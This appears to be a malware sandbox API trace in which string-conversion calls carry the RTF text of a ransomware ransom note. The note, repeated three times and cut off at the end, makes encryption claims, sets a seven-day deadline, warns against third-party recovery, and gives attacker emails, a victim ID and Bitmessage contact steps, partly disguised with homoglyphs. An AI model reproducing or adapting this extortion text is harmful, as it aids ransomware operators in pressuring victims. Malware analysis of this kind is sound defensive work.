lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w 